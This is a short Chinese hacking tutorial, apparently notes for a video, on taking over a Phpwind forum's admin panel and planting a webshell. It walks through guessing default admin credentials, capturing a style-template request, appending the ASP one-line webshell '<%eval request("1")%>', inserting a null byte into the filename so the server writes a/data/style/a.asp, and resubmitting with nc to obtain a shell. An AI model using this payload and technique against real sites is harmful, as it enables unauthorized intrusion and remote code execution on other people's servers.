网站入侵:Phpwind后台拿Shell
动画介绍:
默认登陆页面是 /admin.php
默认登陆页面是 /admin.php
社会工程学猜解默认用户
admin bbs17379
进后台了,不过也没什么上传的地方,就算有,PHP过滤相对于ASP的话还是严得多的。
于是想起以前论坛某牛人的话。
工具:
nc
WSE06b1
Uedit32
风格插件
风格模版
新建一个模版
提交的时候开始抓包
卡住了。
添加风格完成,请速到images目录下建立acaspa并放上相应的图片
抓到的包分两段。
编辑第二段包b.txt
下面是一句话小马。ASP的。密码1
在最后面加下面的小马
[回车]<%eval request("1")%>
action=add&step=3&sid=&setting%5B0%5D=acaspa
第三个参数修改一下。把最后的a改成十六进制的00,跟以前动网的漏洞好像原理一样吧。只是没
想到PHP也有这样的漏洞。C改成.改好后合并,并将其提交数据值改成B的大小。
UE上场。
用NC提交了。
<table width=55% align=center cellspacing=0 cellpadding=4>
<tr><td align=center valign=middle colspan=2><br><br><br>
添加风格完成,请速到images目录下建立a.asp\0并放上相应的图片<br>
嘿嘿。提交完成了。看看效果吧。
一片黑白。呵呵,上传成功了。文件存在。试试连接。
模版生成的目录/data/style/a.asp
测试测试
成功得PHPSHELL
* 如果您发现该内容不能下载,请通知管理员或点击【此处报错】,谢谢!